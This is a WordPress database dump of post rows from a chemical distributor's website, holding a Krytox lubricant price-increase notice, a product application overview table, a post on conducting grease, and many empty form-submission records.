INSERT INTO `wp_posts` VALUES (3203, 215, '2016-12-01 20:32:42', '2016-12-01 20:32:42', '', '', '', 'publish', 'closed', 'closed', '', '3203', '', '', '2016-12-01 20:32:42', '2016-12-01 20:32:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3203/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3204, 2, '2016-12-01 20:37:44', '2016-12-01 20:37:44', '', 'ms-letterhead', '', 'inherit', 'closed', 'closed', '', 'ms-letterhead', '', '', '2016-12-01 20:37:44', '2016-12-01 20:37:44', '', 3190, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/ms-letterhead.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3205, 2, '2016-12-01 20:37:51', '2016-12-01 20:37:51', '<img class="alignnone size-full wp-image-3204" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/ms-letterhead.jpg" alt="ms-letterhead" width="1012" height="292" />\r\n\r\nDecember 1, 2016\r\n\r\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\r\n\r\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\r\n\r\nAs you can see from the <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a></strong></span> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\r\n\r\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\r\nquotation.\r\n\r\nIf you have any questions or concerns, please let us know\r\n\r\nSincerely\r\nCustomer Service Department\r\nMiller-Stephenson Chemical\r\n\r\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'inherit', 'closed', 'closed', '', '3190-revision-v1', '', '', '2016-12-01 20:37:51', '2016-12-01 20:37:51', '', 3190, 'https://www.miller-stephenson.com/3190-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3206, 0, '2016-12-02 07:07:12', '2016-12-02 07:07:12', '', '', '', 'publish', 'closed', 'closed', '', '3206', '', '', '2016-12-02 07:07:12', '2016-12-02 07:07:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3206/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3207, 216, '2016-12-02 11:33:19', '2016-12-02 11:33:19', '', '', '', 'publish', 'closed', 'closed', '', '3207', '', '', '2016-12-02 11:33:19', '2016-12-02 11:33:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3207/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3208, 217, '2016-12-02 12:18:25', '2016-12-02 12:18:25', '', '', '', 'publish', 'closed', 'closed', '', '3208', '', '', '2016-12-02 12:18:26', '2016-12-02 12:18:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3208/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3209, 218, '2016-12-02 12:30:50', '2016-12-02 12:30:50', '', '', '', 'publish', 'closed', 'closed', '', '3209', '', '', '2016-12-02 12:30:50', '2016-12-02 12:30:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3209/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3210, 219, '2016-12-02 13:40:56', '2016-12-02 13:40:56', '', '', '', 'publish', 'closed', 'closed', '', '3210', '', '', '2016-12-02 13:40:57', '2016-12-02 13:40:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3210/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3211, 0, '2016-12-02 14:51:44', '2016-12-02 14:51:44', '', '', '', 'publish', 'closed', 'closed', '', '3211', '', '', '2016-12-02 14:51:45', '2016-12-02 14:51:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/3211/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3212, 0, '2016-12-02 21:48:36', '2016-12-02 21:48:36', '', '', '', 'publish', 'closed', 'closed', '', '3212', '', '', '2016-12-02 21:48:37', '2016-12-02 21:48:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3212/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3213, 0, '2016-12-04 04:05:06', '2016-12-04 04:05:06', '', '', '', 'publish', 'closed', 'closed', '', '3213', '', '', '2016-12-04 04:05:07', '2016-12-04 04:05:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3213/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3214, 0, '2016-12-04 09:03:15', '2016-12-04 09:03:15', '', '', '', 'publish', 'closed', 'closed', '', '3214', '', '', '2016-12-04 09:03:16', '2016-12-04 09:03:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3214/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3216, 2, '2016-12-05 13:21:04', '2016-12-05 13:21:04', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-05 13:21:04', '2016-12-05 13:21:04', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3218, 0, '2016-12-05 15:06:52', '2016-12-05 15:06:52', '', '', '', 'publish', 'closed', 'closed', '', '3218', '', '', '2016-12-05 15:06:53', '2016-12-05 15:06:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/3218/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3219, 223, '2016-12-05 17:55:02', '2016-12-05 17:55:02', '', '', '', 'publish', 'closed', 'closed', '', '3219', '', '', '2016-12-05 17:55:02', '2016-12-05 17:55:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/3219/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3220, 224, '2016-12-05 18:11:06', '2016-12-05 18:11:06', '', '', '', 'publish', 'closed', 'closed', '', '3220', '', '', '2016-12-05 18:11:06', '2016-12-05 18:11:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/3220/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3221, 0, '2016-12-05 19:31:00', '2016-12-05 19:31:00', '', '', '', 'publish', 'closed', 'closed', '', '3221', '', '', '2016-12-05 19:31:00', '2016-12-05 19:31:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/3221/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3222, 0, '2016-12-05 19:42:46', '2016-12-05 19:42:46', '', '', '', 'publish', 'closed', 'closed', '', '3222', '', '', '2016-12-05 19:42:46', '2016-12-05 19:42:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3222/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3223, 0, '2016-12-05 20:27:07', '2016-12-05 20:27:07', '', '', '', 'publish', 'closed', 'closed', '', '3223', '', '', '2016-12-05 20:27:07', '2016-12-05 20:27:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3223/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3224, 0, '2016-12-06 03:22:06', '2016-12-06 03:22:06', '', '', '', 'publish', 'closed', 'closed', '', '3224', '', '', '2016-12-06 03:22:06', '2016-12-06 03:22:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/3224/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3225, 226, '2016-12-06 14:00:29', '2016-12-06 14:00:29', '', '', '', 'publish', 'closed', 'closed', '', '3225', '', '', '2016-12-06 14:00:29', '2016-12-06 14:00:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3225/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3226, 0, '2016-12-06 15:29:31', '2016-12-06 15:29:31', '', '', '', 'publish', 'closed', 'closed', '', '3226', '', '', '2016-12-06 15:29:31', '2016-12-06 15:29:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3226/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3227, 0, '2016-12-06 16:43:03', '2016-12-06 16:43:03', '', '', '', 'publish', 'closed', 'closed', '', '3227', '', '', '2016-12-06 16:43:04', '2016-12-06 16:43:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/3227/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3229, 0, '2016-12-06 17:35:12', '2016-12-06 17:35:12', '', '', '', 'publish', 'closed', 'closed', '', '3229', '', '', '2016-12-06 17:35:12', '2016-12-06 17:35:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3229/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3230, 0, '2016-12-06 20:15:55', '2016-12-06 20:15:55', '', '', '', 'publish', 'closed', 'closed', '', '3230', '', '', '2016-12-06 20:15:55', '2016-12-06 20:15:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3230/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3231, 0, '2016-12-07 05:57:18', '2016-12-07 05:57:18', '', '', '', 'publish', 'closed', 'closed', '', '3231', '', '', '2016-12-07 05:57:18', '2016-12-07 05:57:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3231/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3232, 0, '2016-12-07 14:08:06', '2016-12-07 14:08:06', '', '', '', 'publish', 'closed', 'closed', '', '3232', '', '', '2016-12-07 14:08:07', '2016-12-07 14:08:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3232/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3233, 0, '2016-12-07 18:06:28', '2016-12-07 18:06:28', '', '', '', 'publish', 'closed', 'closed', '', '3233', '', '', '2016-12-07 18:06:28', '2016-12-07 18:06:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3233/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3234, 0, '2016-12-07 21:03:21', '2016-12-07 21:03:21', '', '', '', 'publish', 'closed', 'closed', '', '3234', '', '', '2016-12-07 21:03:22', '2016-12-07 21:03:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/3234/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3235, 0, '2016-12-08 09:52:24', '2016-12-08 09:52:24', '', '', '', 'publish', 'closed', 'closed', '', '3235', '', '', '2016-12-08 09:52:24', '2016-12-08 09:52:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3235/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3236, 0, '2016-12-09 16:04:20', '2016-12-09 16:04:20', '', '', '', 'publish', 'closed', 'closed', '', '3236', '', '', '2016-12-09 16:04:20', '2016-12-09 16:04:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3236/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3237, 2, '2016-12-09 19:41:04', '2016-12-09 19:41:04', 'Krytox™ perfluoropolyether (PFPE) oils with no additives are good insulators. The typical dielectric properties are shown in the table. There is no difference in the electrical properties of different grades of oils, as their chemical properties are identical, and the primary difference is viscosity. The properties vary slightly, with increasing viscosity typically having higher values.\r\n\r\nA vacuum pump fluid, or GPL oil, or 143-series oil with the same viscosity will have the same electrical properties. Oils with additives and/or contaminated with wear debris or water could have different properties.\r\n\r\nThe electrical properties of additive-free Krytox™ greases thickened with polytetrafluoroethylene (PTFE) approach those of the oils; however, incorporation of some additives may significantly alter these values. In fact, the conductivity of the grease may be increased, if desired, by incorporating a conductive additive, such as powdered copper metal, as used in the GPL 246 electrical conducting grease.\r\n\r\n<img class="alignnone  wp-image-3238" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/electrical-grease.jpg" alt="electrical-grease" width="438" height="400" />s', 'Krytox - Electrical Conducting Grease', '', 'publish', 'closed', 'closed', '', 'krytox-electrical-conducting-grease', '', '', '2016-12-09 19:41:04', '2016-12-09 19:41:04', '', 0, 'https://www.miller-stephenson.com/?p=3237', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3238, 2, '2016-12-09 16:32:54', '2016-12-09 16:32:54', '', 'electrical-grease', '', 'inherit', 'closed', 'closed', '', 'electrical-grease', '', '', '2016-12-09 16:32:54', '2016-12-09 16:32:54', '', 3237, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/electrical-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3239, 0, '2016-12-09 17:54:24', '2016-12-09 17:54:24', '', '', '', 'publish', 'closed', 'closed', '', '3239', '', '', '2016-12-09 17:54:25', '2016-12-09 17:54:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/3239/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3240, 2, '2016-12-09 19:41:04', '2016-12-09 19:41:04', 'Krytox™ perfluoropolyether (PFPE) oils with no additives are good insulators. The typical dielectric properties are shown in the table. There is no difference in the electrical properties of different grades of oils, as their chemical properties are identical, and the primary difference is viscosity. The properties vary slightly, with increasing viscosity typically having higher values.\r\n\r\nA vacuum pump fluid, or GPL oil, or 143-series oil with the same viscosity will have the same electrical properties. Oils with additives and/or contaminated with wear debris or water could have different properties.\r\n\r\nThe electrical properties of additive-free Krytox™ greases thickened with polytetrafluoroethylene (PTFE) approach those of the oils; however, incorporation of some additives may significantly alter these values. In fact, the conductivity of the grease may be increased, if desired, by incorporating a conductive additive, such as powdered copper metal, as used in the GPL 246 electrical conducting grease.\r\n\r\n<img class="alignnone  wp-image-3238" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/electrical-grease.jpg" alt="electrical-grease" width="438" height="400" />s', 'Krytox - Electrical Conducting Grease', '', 'inherit', 'closed', 'closed', '', '3237-revision-v1', '', '', '2016-12-09 19:41:04', '2016-12-09 19:41:04', '', 3237, 'https://www.miller-stephenson.com/3237-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3241, 0, '2016-12-10 01:10:59', '2016-12-10 01:10:59', '', '', '', 'publish', 'closed', 'closed', '', '3241', '', '', '2016-12-10 01:11:00', '2016-12-10 01:11:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/3241/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3242, 0, '2016-12-10 13:36:57', '2016-12-10 13:36:57', '', '', '', 'publish', 'closed', 'closed', '', '3242', '', '', '2016-12-10 13:36:57', '2016-12-10 13:36:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3242/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3243, 0, '2016-12-12 10:28:28', '2016-12-12 10:28:28', '', '', '', 'publish', 'closed', 'closed', '', '3243', '', '', '2016-12-12 10:28:28', '2016-12-12 10:28:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3243/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3244, 0, '2016-12-13 11:03:52', '2016-12-13 11:03:52', '', '', '', 'publish', 'closed', 'closed', '', '3244', '', '', '2016-12-13 11:03:52', '2016-12-13 11:03:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3244/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3246, 0, '2016-12-13 14:41:41', '2016-12-13 14:41:41', '', '', '', 'publish', 'closed', 'closed', '', '3246', '', '', '2016-12-13 14:41:42', '2016-12-13 14:41:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3246/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3247, 107, '2016-12-13 17:01:18', '2016-12-13 17:01:18', '', '', '', 'publish', 'closed', 'closed', '', '3247', '', '', '2016-12-13 17:01:19', '2016-12-13 17:01:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3247/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3248, 0, '2016-12-13 22:12:10', '2016-12-13 22:12:10', '', '', '', 'publish', 'closed', 'closed', '', '3248', '', '', '2016-12-13 22:12:10', '2016-12-13 22:12:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3248/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3249, 0, '2016-12-14 16:17:20', '2016-12-14 16:17:20', '', '', '', 'publish', 'closed', 'closed', '', '3249', '', '', '2016-12-14 16:17:20', '2016-12-14 16:17:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3249/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3250, 0, '2016-12-14 17:02:51', '2016-12-14 17:02:51', '', '', '', 'publish', 'closed', 'closed', '', '3250', '', '', '2016-12-14 17:02:51', '2016-12-14 17:02:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3250/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3251, 0, '2016-12-14 17:09:34', '2016-12-14 17:09:34', '', '', '', 'publish', 'closed', 'closed', '', '3251', '', '', '2016-12-14 17:09:34', '2016-12-14 17:09:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3251/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3252, 0, '2016-12-14 19:22:08', '2016-12-14 19:22:08', '', '', '', 'publish', 'closed', 'closed', '', '3252', '', '', '2016-12-14 19:22:09', '2016-12-14 19:22:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3252/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3253, 0, '2016-12-15 02:45:28', '2016-12-15 02:45:28', '', '', '', 'publish', 'closed', 'closed', '', '3253', '', '', '2016-12-15 02:45:28', '2016-12-15 02:45:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3253/', 0, 'nf_sub', '', 0); 
